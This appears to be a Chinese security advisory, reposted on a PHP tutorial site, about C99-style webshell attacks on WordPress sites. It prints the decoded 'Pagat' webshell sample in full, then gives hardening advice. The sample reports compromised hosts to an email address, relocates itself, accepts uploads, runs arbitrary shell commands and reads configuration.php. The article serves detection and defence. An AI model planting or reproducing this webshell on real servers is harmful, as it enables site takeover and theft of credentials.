wordpress c99 php webshell 攻击加剧安恒明御APT预警平台webshell审计告警-php教程-PHP中文網

首頁

後端開發

php教程

wordpress c99 php webshell 攻击加剧安恒明御APT预警平台webshell审计告警

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 20, 2016 pm 12:31 PM

wordpress c99 php webshell 攻击加剧安恒明御APT预警平台webshell审计告警

近期，IBM的管理安全服务(MSS) 团队发出警告，称其监测到通过利用C99 php webshell，大量WordPress站点遭受到新的攻击，提醒WordPress站点管理员应及时扫描并修复站点漏洞。

据悉，基于IBM MSS团队长期对恶意事件的监测分析，安全研究人员发现在过去的两个月，出现了类C99 webshell引起的流量异常，其中在二月份监测到的事件数量为404件，而在三月份则达到588件，具体如下

详细新闻见

https://securityintelligence.com/got-wordpress-php-c99-webshell-attacks-increasing/

安恒研究院通过 google搜索收集了c99 webshell样本

解密后得到

error_reporting ( 0 ) ;

if ( ! isset ( $_SESSION [ ‘bajak’ ])) {

$visitcount = 0 ;

$web = $_SERVER [ ‘HTTP_HOST’ ] ;

$inj = $_SERVER [ ‘REQUEST_URI’ ] ;

$body = “ada yang inject \n { $web }{ $inj }” ;

$safem0de = @ ini_get ( ‘safe_mode’ ) ;

if ( ! $safem0de ) {

$security = ‘SAFE_MODE = OFF’ ;

} else {

$security = ‘SAFE_MODE = ON’ ;

}

$serper = gethostbyname ( $_SERVER [ ‘SERVER_ADDR’ ]) ;

$injektor = gethostbyname ( $_SERVER [ ‘REMOTE_ADDR’ ]) ;

mail ( ‘cumicd@gmail.com’ , “{ $body }” , “Hasil Bajakan http://{ $web }{ $inj } \n { $security } \n IP Server = { $serper } \n IP Injector= { $injektor }” ) ;

$_SESSION [ ‘bajak’ ] = 0 ;

} else {

$_SESSION [ ‘bajak’ ] ++ ;

}

if ( isset ( $_GET [ ‘clone’ ])) {

$source = $_SERVER [ ‘SCRIPT_FILENAME’ ] ;

$desti = $_SERVER [ ‘DOCUMENT_ROOT’ ] . ‘/images/stories/food/footer.php’ ;

rename ( $source , $desti ) ;

}

$safem0de = @ ini_get ( ‘safe_mode’ ) ;

if ( ! $safem0de ) {

$security = ‘SAFE_MODE : OFF’ ;

} else {

$security = ‘SAFE_MODE : ON’ ;

}

echo ‘

Pagat – Shell
’ ;

echo ‘’ . $security . ‘
’ ;

$cur_user = ‘(‘ . get_current_user ( ) . ‘)’ ;

echo ‘User : uid=’ . getmyuid ( ) . $cur_user . ‘ gid=’ . getmygid ( ) . $cur_user . ‘
’ ;

echo ‘Uname : ‘ . php_uname ( ) . ‘
’ ;

function pwd ( )

{

$cwd = getcwd ( ) ;

if ( $u = strrpos ( $cwd , ‘/’ )) {

if ( $u != strlen ( $cwd ) – 1 ) {

return $cwd . ‘/’ ;

} else {

return $cwd ;

}

} elseif ( $u = strrpos ( $cwd , ‘ \\ ‘ )) {

if ( $u != strlen ( $cwd ) – 1 ) {

return $cwd . ‘ \\ ‘ ;

} else {

return $cwd ;

}

echo ‘

’ ;

echo ‘

’ ;

if ( isset ( $_POST [ ‘submit’ ])) {

$uploaddir = pwd ( ) ;

if ( ! ( $name = $_POST [ ‘newname’ ])) {

$name = $_FILES [ ‘userfile’ ] [ ‘name’ ] ;

}

move_uploaded_file ( $_FILES [ ‘userfile’ ] [ ‘tmp_name’ ] , $uploaddir . $name ) ;

if ( move_uploaded_file ( $_FILES [ ‘userfile’ ] [ ‘tmp_name’ ] , $uploaddir . $name )) {

echo ‘Upload GAGAL!!!’ ;

} else {

echo ‘Upload Success to ‘ . $uploaddir . $name . ‘ :\P ‘ ;

}

if ( isset ( $_POST [ ‘command’ ])) {

$cmd = $_POST [ ‘cmd’ ] ;

echo ‘

<font>’ .  shell_exec ( $cmd ) .  ‘</font>

’ ;

} elseif ( isset ( $_GET [ ‘cmd’ ])) {

$comd = $_GET [ ‘cmd’ ] ;

echo ‘

<font>’ .  shell_exec ( $comd ) .  ‘</font>

’ ;

} elseif ( isset ( $_GET [ ‘rf’ ])) {

$rf = file_get_contents ( ‘../../configuration.php’ ) ;

echo $rf ;

} else {

echo ‘

<font>’ .  shell_exec ( ‘ls -la’ ) .  ‘</font>

’ ;

}

进一步分析受害wordpress情况发现

https://www.google.com.hk/?gws_rd=ssl#safe=strict&q=pagat+shell

Webshell可允许攻击者在服务器上运行终端命令或上传新的文件到站点上，新的文件可以是更具侵入性的webshells，DDoS客户端，比特币矿工软件或者是其他的恶意软件

据IBM MSS团队称，截至至2016年4月12日，仅通过Google 搜索引擎简单查询，就发现其中约有32000个WordPress站点存在pagat.txt文件

apt预警平台能够实时监测到webshell攻击行为并告警 c99的webshell也没能逃过 apt 预警平台的规则被准确的告警出来帮助用于第一时间发现webshell攻击行为

安全建议:

基于目前的情况，建议站点管理员可以进行如下操作，

1、编辑php.ini文件，禁用base64解码功能。在php.ini文件中，找到相关配置语句“disable_functions =”，将该语句设置成“disable_functions = eval，base64_decode, gzinflate”；

2、更改上传文件夹名称。WordPress 允许通过上传程序将文件写入到上传文件夹，如果用户仍然使用默认名称，攻击者可较为容易推测到上传文件的具体路径，使得攻击者上传包含 shell 脚本的PHP文件的成本大大降低；

3、安装一款可用性较强的安全插件，如wordfence WordPress 插件；

4、进行安全扫描。建议使用开源扫描工具，对上传文件进行全量扫描，这里可使用扫描工具Modsecurity，同时通过AWVS或者WordPress 安全扫描器对站点进行扫描，及时发现漏洞，并进行修复加固；

5、如果发现站点已经被感染了，建议及时变更站点的所有管理账户密码，并告知站点用户进行密码变更。

安全研究员：zise

陳述

本文內容由網友自願投稿，版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容，請聯絡admin@php.cn

PHP類型提示如何起作用，包括標量類型，返回類型，聯合類型和無效類型？Apr 17, 2025 am 12:25 AM

PHP類型提示提升代碼質量和可讀性。 1)標量類型提示：自PHP7.0起，允許在函數參數中指定基本數據類型，如int、float等。 2)返回類型提示：確保函數返回值類型的一致性。 3)聯合類型提示：自PHP8.0起，允許在函數參數或返回值中指定多個類型。 4)可空類型提示：允許包含null值，處理可能返回空值的函數。

PHP如何處理對象克隆（克隆關鍵字）和__clone魔法方法？Apr 17, 2025 am 12:24 AM

PHP中使用clone關鍵字創建對象副本，並通過\_\_clone魔法方法定制克隆行為。 1.使用clone關鍵字進行淺拷貝，克隆對象的屬性但不克隆對象屬性內的對象。 2.通過\_\_clone方法可以深拷貝嵌套對象，避免淺拷貝問題。 3.注意避免克隆中的循環引用和性能問題，優化克隆操作以提高效率。

PHP與Python：用例和應用程序Apr 17, 2025 am 12:23 AM

PHP適用於Web開發和內容管理系統，Python適合數據科學、機器學習和自動化腳本。 1.PHP在構建快速、可擴展的網站和應用程序方面表現出色，常用於WordPress等CMS。 2.Python在數據科學和機器學習領域表現卓越，擁有豐富的庫如NumPy和TensorFlow。

描述不同的HTTP緩存標頭（例如，Cache-Control，ETAG，最後修飾）。Apr 17, 2025 am 12:22 AM

HTTP緩存頭的關鍵玩家包括Cache-Control、ETag和Last-Modified。 1.Cache-Control用於控制緩存策略，示例：Cache-Control:max-age=3600,public。 2.ETag通過唯一標識符驗證資源變化，示例：ETag:"686897696a7c876b7e"。 3.Last-Modified指示資源最後修改時間，示例：Last-Modified:Wed,21Oct201507:28:00GMT。

說明PHP中的安全密碼散列（例如，password_hash，password_verify）。為什麼不使用MD5或SHA1？Apr 17, 2025 am 12:06 AM

在PHP中，應使用password_hash和password_verify函數實現安全的密碼哈希處理，不應使用MD5或SHA1。1)password_hash生成包含鹽值的哈希，增強安全性。 2)password_verify驗證密碼，通過比較哈希值確保安全。 3)MD5和SHA1易受攻擊且缺乏鹽值，不適合現代密碼安全。

PHP：服務器端腳本語言的簡介Apr 16, 2025 am 12:18 AM

PHP是一種服務器端腳本語言，用於動態網頁開發和服務器端應用程序。 1.PHP是一種解釋型語言，無需編譯，適合快速開發。 2.PHP代碼嵌入HTML中，易於網頁開發。 3.PHP處理服務器端邏輯，生成HTML輸出，支持用戶交互和數據處理。 4.PHP可與數據庫交互，處理表單提交，執行服務器端任務。

PHP和網絡：探索其長期影響Apr 16, 2025 am 12:17 AM

PHP在過去幾十年中塑造了網絡，並將繼續在Web開發中扮演重要角色。 1)PHP起源於1994年，因其易用性和與MySQL的無縫集成成為開發者首選。 2)其核心功能包括生成動態內容和與數據庫的集成，使得網站能夠實時更新和個性化展示。 3)PHP的廣泛應用和生態系統推動了其長期影響，但也面臨版本更新和安全性挑戰。 4)近年來的性能改進，如PHP7的發布，使其能與現代語言競爭。 5)未來，PHP需應對容器化、微服務等新挑戰，但其靈活性和活躍社區使其具備適應能力。